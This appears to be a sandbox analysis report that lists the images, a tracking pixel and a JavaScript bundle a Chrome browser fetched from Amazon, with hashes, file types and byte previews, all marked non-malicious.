                                                                                                                                                                                                                                                                      SHA-512:665AB96F49311BA180EF931C0BAC738F3739258552B4E408F2867D5466F3534177796BCFA6CC90D006B696E5C76BC05EF2B7F86A62C62477534D3E6A1DE6B10B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Fitness-Cardio-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#.............".................................................kV*.....S...rk...t4sg....%MS.m8.R.Y.;0...l2.~}._+D=...R.^l.6.|..z.V=-SriM...6.k..SJ..Vb....>.SQ..nv.%....c...TN.ikV..4[.R..T.o....k.T....,Sh]....b.....".Z5s.gGG...gW..oK.......mb.nf=lS.Dn...ZE..v....v|?...#...C.6<...7SjY,.w..bh....M.W>.'..6.>1..}'.=Mi..]..mK!...u1TF.Ik.c,.V....6...x....?CRy.f...Y.7=.K..v..2..,.9..|.1.3....O.$...U......u^.F.D]...[...E0./..4...=..h.-.n.-....g..j.r.....59...)~w.{..q..u....R..=....vq.5k.M.2.....k..t{.F.}..O2...v[*UZ3...uV.1.Z..i.Zb._...w.9.6{o..+i...}w].Uo...j.\b_E..~..J..|w.............b_}.S+....V...4..(.6.r.._.{_R....=G..>.....}.Si./..}6..1-.)....J7u,..Y.........}...B..y./n.!.?..J=.....b.].X..Q.k-B.......A.~u....u......7..;Z{^..*jZ.F.,_U*...+....|...=...7{&.....e~M...~...-...gq..Fm.U..n.:....:...
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):24758
                                                                                                                                                                                                                                                                      Entropy (8bit):7.911565502325638
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:a+OUK6NuuhSQV01Av/BpkO7uu1rUBadi9:dOx6Ng801+jPQadA
                                                                                                                                                                                                                                                                      MD5:C4FAF89AA83271D1D60498B89DD8A9D4
                                                                                                                                                                                                                                                                      SHA1:168A7C2F9CF862D4B4A655E7F808961D0EEE5595
                                                                                                                                                                                                                                                                      SHA-256:3F21C3F6B1210D65BF6B3264A0AE7D2644922E8A0F14DE4D7E2A50638BEB560B
                                                                                                                                                                                                                                                                      SHA-512:61935F55A04B52813088E80A10445F3EA08A50DE12D01E518012AB1DFB3497819BD52C5A2A5886202679A66DF214C89103A7464A7E86119ACF0A32BEE3926482
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/rbs_ohl_outdoors_silver/xcm_banners_mena_440x400_coop_6col_phl-weber_440x400_ae-en.jpg
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................Z.............................!..1.."AQa..#29q.....$%By...378CStuwx..:RX..&'()4bhs..................................."........................!..."..B............?..C..............................................................................................................................................................................................................K..j..n.7f..:x...6h.A..8X.E.H.z.T./b....`{....<......;.v~........X5..*`!.B.W.=r..0.Jr.H@D...9R7.......k..v....eH..Ei.F.......H.(.?......P./I.}.2*.b...8.....<L.!...~.......|...d.Q..QK...b..D}..&..8..Z_,4...V...W.;1... n(.B....f..L......8!ea.-....E.j.......a...0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..0..9....s....|}.Ku..>...KEHM.W&%A....h.......&.5.R..]gM..d.l....=.....l....H......I.&.1.U.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):8327
                                                                                                                                                                                                                                                                      Entropy (8bit):7.737215838786652
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:ePwcly0XixCa94KxYpCXcZ+7YH9icDVXfdCACtpP2dUClJ:r6XQB94K3D7YH9RDVlJIMdU0
                                                                                                                                                                                                                                                                      MD5:0ED4C8CAB7485BA7C52ADAB0109CD52F
                                                                                                                                                                                                                                                                      SHA1:BD0D412BE62B3F4890CC3A3F54CC6AA5505B4EC3
                                                                                                                                                                                                                                                                      SHA-256:3FB55228D8FA31E9D5B8416B2141206E8CB051BB2FC9EF6EE3A1EE5C13649635
                                                                                                                                                                                                                                                                      SHA-512:C39BFDDF64F3EBB16AF0BB13A23B15B1253C8E1578663A992C4873F4CE471BD785DF86E52F5161ED4C7D779018B341432B9679A03050DD3FF4E02E4A07B4C9B9
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/31EO3Wv+aeL._SR480,440_.jpg"
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1.........................................................................................................................................................................................................k..'.}9.............}.|......}~|.._. .....'....G.g.'............}.|w.b......g.W..a..........<......@.3...:A.I0....=.&..D...D...$.........G4.L...jsZt..4..,..W..._.....+.fY.0zd>X...$XV...."n...... s..../Uv..x.W]Sb...^6.p..`...5.5.6.}.._Ci2..-O...9..M.....u.t.q..*.o...G.4.....,G..."n...... s...AU.T._.Z.r...r ..Mf....!.u..Y.>...:]Y0...,.....v.%.78.ZG....I.dJ{.....|..M..p........@.`.....{.^K:......I..6.:w.eC....^...x....C.d._..38F.*.a...w..d...s.G........:<..."X..b.`..&........<..(.ri.........p..b.{.Fs..[.e..U1.M1.E,..|.^iB..].p...A.v.-.+.x...p..j......W............ g.<.m.*..Y..[.^...."5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):34220
                                                                                                                                                                                                                                                                      Entropy (8bit):7.969744350320113
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1jQCul0a4QwMo9HZARjOPkA8I3x0qRWiGhsXW3A9wJj6zP28b4:RQCa0aeHTAQ8A8I32tfJsb4
                                                                                                                                                                                                                                                                      MD5:0ACB01DE0D59D0B7945D9B8504B1D140
                                                                                                                                                                                                                                                                      SHA1:DEEA6333C21C34B29ADABED868C7FE5E81EA5831
                                                                                                                                                                                                                                                                      SHA-256:CE3579433FA0B028890B9458D385B5A607CFF9B7618918F2A3C6E55C21036614
                                                                                                                                                                                                                                                                      SHA-512:9E5A32226F82E4861C611FD989803594C5CA54885085E7AC48B4155E05B4A6797AC4AB330FA5399ABCCEF2C726509D6AA6BEEA5E19FC1981498C6F20FF334790
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Activities-Running-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................En.e6L....S-.M....j.+J.6....]m;V...DC.$.K...D....ul...:.1.P........Ud.j.)b.*v.k.aY..M.....YZ..)aP"Y.*.f+..b....tek...&.j.P..;=o.u.0t.h..f..T!....b..WJ....zo......O..f...{}......V...[.B.u..].....x.o..c...v.rj,...T...6}z.$."k.......wx.'..+{{.H....a...V..+U/..*.1+O...m...y...e..u....~..-....$....}HEst...`.._.oj|M...r.^g......{B.T...+H...Q.F./d.9=|....t..[...7.6S....)j.EO[-V.vI.I...U&.....}....W....o.L......".s#..S.lU.Xh..~N...B[W.._..W.<'..7e.aa&..j4.fy..?U.fbg.W......|..}....~S.l[.u.+.j...b..U9..X..n.?.xnnJ.a.....s|...W.<.7i..\..E.1....f'.O#..H...Wr.ox..9.Z...y...t.w.$.e+...........N.q......O7......_.N.......,.....!A'a.+'....W......mI.^N.e..y.ir....w.6.4...}K.gY+!.G....'..<>..8y>o.:>....{./+....gPG.t}2H..[....^......._B.........+$0.C...7.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):6870
                                                                                                                                                                                                                                                                      Entropy (8bit):7.638182707225435
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1b2WitYqTzeyyyyyyyyyyyyyyyyyyyyymKlEeUsj5M+S4d:1smyyyyyyyyyyyyyyyyyyyyy9Yw5I4d
                                                                                                                                                                                                                                                                      MD5:A50B8338BD9A8470088B744C9D3F1C8C
                                                                                                                                                                                                                                                                      SHA1:EADAC28E52F05FCF25998CB6452A9ECB4ACDE507
                                                                                                                                                                                                                                                                      SHA-256:9E0FD225453B5769D5C9338CE848C0727D915D2D55CD20FE1D1A065FFAF7F136
                                                                                                                                                                                                                                                                      SHA-512:317AD3C1F667BA030D7FEF9B4815A3F77C75319CBE41D779F7EDDF815E2DC8E33D4D6B4216E78E8D174801C9029F25EB1A70828035F3355A96016CB7C7C632EA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Top-brands-header-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................<.......................f.........................6/.........3MhP.w".&..~............l^........$.^...d.vd.5.}a........6[.....~Ge......'.j.g/C'..Ab........3b...............p}....\No@r.]..!`.6*....5....?...e)+'.Xp..._M..C..........l^...........Ig.7..u.G.:2...,..F^.dn.Ff.^^......Z.s...,Yz;.r..1...........x........mX.......4.....Ue......k{.O....V...j..K~....-....f..F{.....................i....;.\..................................f.........................7.....................................................k .V.P........6.o9..|...b............R.\jM...2........................................................F@...........d.....7Ov'B.c(.{e].5.1..O`....2.......g..V.E..w..y.........2.........^....C...g.[.Z.3......@...............,...........................26..`.5
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:261-8635865-4706955:3YMHCN1ADEMYQEW81YBE$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295396.0%26id%3D3YMHCN1ADEMYQEW81YBE%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3D3YMHCN1ADEMYQEW81YBE%26ue%3D10%26bb%3D678%26ns%3D693%26af%3D754%26ne%3D994%26be%3D1200%26fp%3D810%26fcp%3D810%26pc%3D5256%26tc%3D-1918%26na_%3D-1918%26ul_%3D-1724264954036%26_ul%3D-1724264954036%26rd_%3D-1724264954036%26_rd%3D-1724264954036%26fe_%3D-1916%26lk_%3D-1866%26_lk%3D-1866%26co_%3D-1866%26_co%3D-1086%26sc_%3D-1863%26rq_%3D-1081%26rs_%3D-110%26_rs%3D423%26dl_%3D-44%26di_%3D1307%26de_%3D1307%26_de%3D1318%26_dc%3D5255%26ld_%3D5256%26_ld%3D-1724264954036%26ntd%3D0%26ty%3D0%26rc%3D0%26hob%3D7%26hoe%3D11%26ld%3D5257%26t%3D1724264959293%26ctb%3D1%26rt%3D_af%3A7-2-3-2-2-3-0_ld%3A42-7-5-27-4-3-1%26csmtags%3Daui%7Caui%3Aaui_build_date%3A3.24.6-2024-08-12%7Caui%3Acss%3Acache%7Caui%3Ajs%3Acache%7CmutObsYes%7Cewc%3Aunpersist%7Cewc%3Aunpersist%3Aemptycart%7Cewc%3Abview%7Cewc%7Cewc%3Aunrec%7Cewc%3Acartsize%3A0%7Cewc%3Aaui%7Cnavbar%7CmutObsActive%7CFWCIMEnabled%7Cfls-eu-amazon-ae%7Cadblk_no%7CperfYes%7Cfy_cdn_fr%7Cfy_cdn_mp%7Caui%3Asw%3Apage_proxy%3Arequest_feature_tags%3Atimed_out%26viz%3Dvisible%3A10%26pty%3DLanding%26spty%3DBrowsePage%26pti%3D15149894031%26tid%3D3YMHCN1ADEMYQEW81YBE%26aftb%3D1%26lob%3D1:5257
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 124x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):13211
                                                                                                                                                                                                                                                                      Entropy (8bit):7.961535399607753
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:eO4ybEdtzOL6JjOGzS46ERnMFB3TIIB9q3QUZyGXJx:eUE+L6JlW4vRnMFV79eQ2BXJx
                                                                                                                                                                                                                                                                      MD5:BB033813881044D9E7C3D43D33B19787
                                                                                                                                                                                                                                                                      SHA1:3DE237799F3C9B9F15D4E9A689480C684244BB12
                                                                                                                                                                                                                                                                      SHA-256:3A7BEDA40DD2E154AC82C7BEFA8BC69FC1F9D8D219EC58AF3C2A72BF021372AC
                                                                                                                                                                                                                                                                      SHA-512:9083E9AE1AE7E1A347C7BC42025B51A5BB1D7566A235A4067E0147FDD76FD9B9DF69409AF86894B6C51EFA25A2D81F33D83375B5962E41C4B01D40E047A63C0E
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81iJG2js5-S._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........|.."..............................................................!..1"2A..q#a3BQ..b..RTr....$%s..C..................................................!.1A."Qaq.2...........#bBCR.............?.t._Q6.....t.~.S...FDR. LE..d.X./...?....&m ~..u6........=...n.MA..n..j\..8.sQ.$....B....R..m];}......Me.k8#..|...........6...+`...fo...........`..).vt..*....D`.g*....+:J..(i+..z.s2.#2.F.NAD.....*..$.....K\..3.......6>B...B..C...0L/.t.......]g.....C..0....M..8..`86..O.......9...\\|...?.x][..B..9..>....Esw1I..{.;........kCf...._Pu..Q/b2...!.....b.YUd.^K?..18[.$|.uk.B4mQ...T.==.2).1.g........X|.5...e....<.z...=.C.$.....7...v.T..!f......2..]Z....J..8..I.... ..........]..o.T.,..]W.RG=;2B.ek....a..0T.NN...h....."..K....(k.._b....E9.%.3......-.Dz.......~..E.I..n...[f..........S+...J.............F..4...A..G.....ss~O'Sz._.:.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x292, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24340
                                                                                                                                                                                                                                                                      Entropy (8bit):7.967645490774351
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:Tl/HxWTnWgYqqTzNO77p+smZ7TaaXjoRmxUdDMMUbo6oy//g7DzdR9Zz/OYW:TDCWv4P/KoExUdgMUbYaA9Zz/OYW
                                                                                                                                                                                                                                                                      MD5:8D15CE73A5C725796EA9A0B4881A43DE
                                                                                                                                                                                                                                                                      SHA1:3E0460C6F4B960D9AD1FAC3F9918B1F2C60D1B01
                                                                                                                                                                                                                                                                      SHA-256:6DF060314BA2D7A88F169ED941B1E008679CDB7BDBDBE3467B17D645DB2E89C7
                                                                                                                                                                                                                                                                      SHA-512:3C5E104BD7A1DABA79262968B9421A660C5C39FD535C36D2995FAD2C143596B4D5245B6AB4DE628D1905B8290C1BE66DE6AEFAF797F5EC128BAE1E07B8DF46C6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......$.@.."..........4................................................................./..{.z..p{...............]E4n..n.....G..#..._..d...s.S....;....;.6..wJww.AO4D.YH:.....F..5..h...~.A`....]3.J...~..4^.....zj..@o,.........VR....[.....'F.Z..6...K....^>L..w.)..5Tsd7.D...$.h"...y..S.~.)k.{e)HV.|.u.........u..3>.b..d.2..0+...w.x.F/z....*...K...*F...Wb..S...n@...[/....@......V....?.~.E]O...9......R..<...| ...6h..4.P.... sX.3.i..v...j/.f2.c.fEy.'.9.....y[......|.p....?K\e...E..3=...z<y..yX...n+.Qs...`..W?...)D..d.J..Nb..&..l.V.j.....w.\t....g.F..S...._.].Q.......*.",...4.V..SWR..xS.]>....6..mz.).+...,.......T.........mz.....s+.,ph....w.~jn.....ew.i._-@.Gb....n......Hg.kP97..e....dSg........2j..ck.3..d.i....:t}[..yS..&....z).X..6.~4...W.....m..=.`.e..H.<..'...nV.-y..8>.t.&........e9'...r.9)..H_..,Z.%`
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9720
                                                                                                                                                                                                                                                                      Entropy (8bit):7.949351729172538
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:HJ3hX9oCmAccgDULcGznEMbV1YpSAluf0NkJ+al0weu4alQuJLIH9Z+:HfKCmAcrUYQnEMTiNkYal0we6lQuCHb+
                                                                                                                                                                                                                                                                      MD5:06962B89C87DF1D03BFF1AB1D2DD8CA5
                                                                                                                                                                                                                                                                      SHA1:45CDF6CF13EF2041107CF96319167F28F5936E38
                                                                                                                                                                                                                                                                      SHA-256:32A555B4B3BDC0CE46DB572BC8A0740198FC999D342464837A53DBC553E70AA3
                                                                                                                                                                                                                                                                      SHA-512:43603EE532CF2FF5929AF6D91319898427FED5C4C52F74097AB4BEF048C24C0150DF225E5D680FD2D4CF9242894E21A88C87421AB6AA6615A124D426BC88C311
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1.".A.#2BQaq.R...3C...$6bc...%Tru.................................................!1..A.q..."#2Qa....CR...............?..t...^.....h."C..V/v.#%...]..;..V..I.O.cZ.i.Vr?...B1m...B@....-.su{ .;.....E.}C.c..s..R@...i..2..............w...J.kW7...<}!....J....uu....,....ZS..sY....S..:T.WB.....E!K...I...EO...+.z..q../d..h1.l...X$..U....>..%....$Q..UZ.....tx....or.Y.#.......S-...Q....{X..kh..F@.P...<..0.....*6c-z.."...I.....................'.%p.K......+.j.i....E...2........F*....l.....l.F.Q..l.T..!..r..R...>.o.j..A.I.....w.cue\z...+.Q.....r....5..e....[.....G.8.r... oq.S...(... .0k.f{..t..gf.{..Q}#.....NVa...m ../......,..`..'....>.....L^s.j$......a.#.].c..[w.L...F.r............'N.}.Jo..*.T..bE..)T$R....(.)J.JR.R..(.\..X....1#.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65433)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):786341
                                                                                                                                                                                                                                                                      Entropy (8bit):5.547907794693936
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:p++YMIif2PWtJ9JixHIvOSVHp/mxovWywNZ8aSgW69g046k2lJUh:pYMWWAxHIVWySZ8aSgWr0u2JUh
                                                                                                                                                                                                                                                                      MD5:E78E8C3AF05597B1FB12D22BDDC3F833
                                                                                                                                                                                                                                                                      SHA1:5222E157EA6F68058D3E55820D47C823E8F2BA06
                                                                                                                                                                                                                                                                      SHA-256:564C2280D7708C04345BEE2EC36F76CCF5832CCD96375FCDD9A4223263F7D68B
                                                                                                                                                                                                                                                                      SHA-512:4222665A5E5220447AD5FD5E19A3BF9AEA6C4FBD80EB5C251ED742D5C4E46F37DF53CB318245936257749CC06FBE628B9D94F514F36296C1AF2AF19708F77281
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/91rNDaUuWZL.js
                                                                                                                                                                                                                                                                      Preview:/*! For license information please see Responsive.bundle.min.js.LICENSE.txt */.var Library;(()=>{var e,t,r,n={7058:(e,t,r)=>{"use strict";r.r(t),r.d(t,{COMMA_DECIMAL_SEPARATOR_LOCALES:()=>n.E,COMMA_DECIMAL_SEPARATOR_MARKETPLACES:()=>n.C,CONTROL:()=>n.K,DEFAULT_LOCALE:()=>n.N,DEFAULT_MARKETPLACE:()=>n.D,Experiments:()=>n.L,LOCALES:()=>n.W,MARKETPLACES:()=>n.V,MARKETPLACES_DATA:()=>n.F,PREFIX_PERCENTAGE_SYMBOL_LOCALES:()=>n.O,PREFIX_PERCENTAGE_SYMBOL_MARKETPLACES:()=>n.P,RIGHT_PLACEMENT_CURRENCIES_LOCALES:()=>n.G,RIGHT_PLACEMENT_CURRENCIES_MARKETPLACES:()=>n.R,S9_DA:()=>n.A,SPACED_CURRENCIES_LOCALES:()=>n.I,SPACED_CURRENCIES_MARKETPLACES:()=>n.H,STATIC_AUTOGEN_CC_AVAILABLE_LOCALES:()=>n.Q,SbTranscodedMedia:()=>n.a8,brandLogoProperties:()=>n._,customImageProperties:()=>n.Z,featuredImageUrl:()=>n.Y,genericCacheBrandLogo:()=>n.$,genericCacheCustomImage:()=>n.a0,genericCacheSBProductCollection:()=>n.a7,genericCacheSbBrandedVideo:()=>n.a4,genericCacheSbBrandedVideoWithTranscodedMedia:()=>n.aa
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 244x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):19735
                                                                                                                                                                                                                                                                      Entropy (8bit):7.972990422541549
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:/azpK1D2FW50jCnkxMNtSS/oi+nKMvbiRAur5hsTbj8whpmLJWNyY:/YweWOGnWMGS/mKWiRAurXkj8whpUJQ3
                                                                                                                                                                                                                                                                      MD5:66D571D791CF14EC5F301165EFFE85B0
                                                                                                                                                                                                                                                                      SHA1:E64E8D101543BB4D7109D49B5B1974298EBE8B12
                                                                                                                                                                                                                                                                      SHA-256:71856C94C7A971BAC64BB24E54A3C685C812320248995E2A79772CD86300EE41
                                                                                                                                                                                                                                                                      SHA-512:3CE3AFB0E983C3CD677AA193688618625A60B4822EAF85C22C9FE7C4D2AE0FD9F6CC5E1CA8EE6E104E1EB1A1384B2F5D46864198261361C8D7BA59F92F9BF476
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/71KCNSueOqL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5..................................................................rI$.I$.I.'...H`.oju.....!?d}D-`...{..Lp.SDrg..w@S...s....>y..prwhE.GD.>..<....2.+..V.D`.g..|.l......M..p*..}....G.?L.(..{7....X..c..N.Y.[......]?#c....o...j.......Gw.@n...g.xj|..[uF..M. ...'...Z...|..G~.....+Sv.t.w`p.I..R......vDt.A<.........N..%...5x..g. ...'.........o..;.zY/^m...k......}.k..i.kE....0..<.TeKa#.p.^.......1h........$0^[.2.)..W......gF.i..{..N.].t.^.cC..S.U.?L....(..(...s..z.9....`..M.h.J.M.3..].,.D<.W........I..".`.jVU.q.z.....U...o_.5.6.'..v,^..L...b...j.`.=.....U.8.EM..$.M...;....!..vpU5.....,....u......2r[...NP..%]..r.s....#-..L..)......<......._pI.....s..uNp.......e2.....!.WD6...0....e...&g.2...2.}.^)o.M5 .]V..s+...m...........D...;.+=.../...'..)."7~[.X...,3...}B..W..Z..|c......?.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):7057
                                                                                                                                                                                                                                                                      Entropy (8bit):7.879747022942763
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:16BSf/y92QX2cQET5fH0/jq2vnrHFtyESsOln:zf/yEjcJTdJYrHbSZln
                                                                                                                                                                                                                                                                      MD5:45CEAC07CD122C7D93C7F7000A908ED5
                                                                                                                                                                                                                                                                      SHA1:34DAF7D08D2FE411938A84DA3DFE2A234285EC0F
                                                                                                                                                                                                                                                                      SHA-256:0163FD15A23FF949346A7231D96F0B07B54827CDBF2306EA85C3595B6C8069A3
                                                                                                                                                                                                                                                                      SHA-512:FD2872CDCDFD83EABC7A6164C733B829A973ED778F52B63012A05EFDAF82D92C54D94869A3EBF89F4227D53EC5916966AC63017E778FD26621B6742A920E437A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.aj.....'..t."|.R>.9..i..|.p...T/.B./.f..~f.O`........_.>....!b.i...8.N%....w...Z&....oP9..M9..K9..I9.......|.2....b.i...\.u.R.&m..j..G.....B'..A......9...q.....=.A.x.k@..p.C.3...d.1.j..E...r6..Z... e........|..r....3..|.2.....C.4...\.[+LKOV-E}X.2Z..mg;.Y..........?.......)....-...j.[k..mi.j*......[H......>@F....wP..p.....).}.....-.........QU.E]..2.......q.Y.^.. ...>g.......X.kmC.ipj..kSW}........g..E3nc..y.R...wa8..).Ew(....3.N..gym.uM.Z.X..-MU.T..p.F3-.Y.a.L..;.`.0..!.8.&...EwD....3`N...{.*....R=.Sj=.uN...x..t...$a..w.....JV5.-......}k......f?!..s:.)+R=..mC...V..Z.{...;-.z4<...!%...>$.q...tWx@.`..[\...m<.[..:2...%[......jv*....|.]}_.......e...../:....4... e..<.<=.=...<.>yi.7.m..6.:.VM{.....2=eC.g...I..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):2473
                                                                                                                                                                                                                                                                      Entropy (8bit):7.694727786644825
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:48:q0fVkQpFW8IAgv+lExW/kMGnZu38hk8j8FFfILk63v:JNkj8rgvO1cMGnZk8hk8j0ILkY
                                                                                                                                                                                                                                                                      MD5:74CF3C6B6B3207BD1221C0982A440C5A
                                                                                                                                                                                                                                                                      SHA1:C4BBCDB3EA6A5A3934FBD66A4DF0F56988E090D0
                                                                                                                                                                                                                                                                      SHA-256:4739E0E18F4ED30A1D48BFD581C39F49ECA0E88F3BAA2E56EF7B987839058E7C
                                                                                                                                                                                                                                                                      SHA-512:1D5F69D2E05C9B0C10ED03E5BAABC7D2CECCB35EA483F8EE33EBB972FE423A66992C1CFBE8EFFA1E767F51EAC56B34563BEBDD2F6184F8CF579E6CC6829ED42F
                                                                                                                                                                                                                                                                      Malicious:false
